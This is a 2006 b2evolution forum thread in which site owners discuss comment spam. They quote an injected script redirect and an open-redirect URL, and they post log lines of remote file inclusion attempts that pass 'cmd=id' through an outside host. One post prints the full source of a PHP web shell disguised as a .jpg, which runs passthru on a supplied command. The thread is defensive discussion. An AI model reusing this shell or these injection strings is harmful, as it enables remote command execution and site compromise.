Recent Topics
  1. b2evolution CMS Support Forums
  2. b2evolution Support
  3. General Support
  4. stealth spamming technics

stealth spamming technics

1 Mar 07, 2006 03:16    

Today I got stealth style of comment spam.

URL become stealth using bug of no-related site.
for example

There is a *free* PHPBB site, it have leave PHPBB software buggy, so spammer use script injection such as;

<span class="maintitle">Cheap Phentermine</span><br /><span class="gen">Cheap Phentermine"><script>var s='http://robodir.com/search.php?tpl=pharm&q=phentermine'; i=1; if (1==i) { document.location=s; } </script><br />&nbsp; </span>

Oh, It is truly *free*!! :-P

How can I handle this type of spam with blacklist? The sites badly maintained should also be in blacklist? A site redirected by this technic, is not spammer site, but through search result, it shows spammer site.

Another example is that some site has a frame which don't check child frame URL which provided by GET method parameter such as

http://www.teachnet.ie/projects.asp?url=http://url_you_want_to_go/

This is pretty easier than first example, because we can show spammers URL inside url string, but it is difficult to reject using DNSRBL based filter.

Back to top

2 Mar 07, 2006 16:25

ive started seeing something different in my own logs, specifically:

200-171-180-139.dsl.telesp.net.br - - [02/Mar/2006:21:07:00 -0600] "GET /archives/category/irritations/index.php?showresults=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/
img/btn_lists.gif?&cmd=id HTTP/1.0" 200 32374 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
ppp106-67.lns1

201-13-106-48.dsl.telesp.net.br - - [07/Mar/2006:07:26:07 -0600] "GET /archives/category/irritations/index.php?showresults=http://www.moonyoung.seoul.kr/zboard/data/
food/pc110002.jpg?&cmd=id HTTP/1.0" 200 32770 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Your thing *looks* more sinister than mine, btw. I just have one more netblock of brazilian ips to block :) that and a ban on urls that contain "zboard"

If you ever wanted to feel intimidated, look at this:

http://www.moonyoung.seoul.kr/zboard/data/

(clicky clicky on some of those) There's definitely something to be said for being able to R E A D what it is im clicking on.

Malformed image:
http://www.moonyoung.seoul.kr/zboard/data/food/Pc110002.jpg

My guess is thats not an image at all.

Back to top

3 Mar 07, 2006 16:33

and so its not:

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>
<b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>
<b>#</b></b></font><br>
<br>
<br>
<hr color="#000000" width=80% height=115px>
<br>
<div align="center">
  <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
    <tr>
      <td width="633" height="17">
<pre><font color="gray" font face="Tahoma" size="2">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
 </tr>
  </table>
</div>

<br>
<hr color="#000000" width=80% height=115px>
<p align="left">
<br>
<b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>
#<a href="mailto:PHPSHELL@bol.com.br">Contact
      Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b>#
:D </b>
</font>

how pleasant :)

It was rooted, http://www.zone-h.com/defacements/mirror/id=3356327/

Back to top

4 Mar 07, 2006 18:07

I hate to target one country, BUT, if anyone is interested in the CIDR notation needed to cover the entire country of Brazil, let me know, Ill share 8|

Back to top

5 Mar 12, 2006 00:44

I'm getting new comment spam with nonsense domain names.

author: Wwqh3nFLyh
email: e97pG@OlR9DoD.com
url: http://Wwqh3nFLyh.com
comment: c5Cqm09w8hcC mEtjZ45otQSWRH 9F2Y0pfO9Tbcz...

and so on..

I got two in the last 10 minutes. but they've been getting stronger every time throough. What are they doing?

I'm running 1.6 Alpha. I've renamed my directories a number of times and have an extensive .htaccess file. Is it time to require users to log in to comment?

Back to top

6 Mar 14, 2006 19:29

I got six more of these today. Since there's no way to stop it I think I'll have to require registration to comment.

Back to top


Form is loading...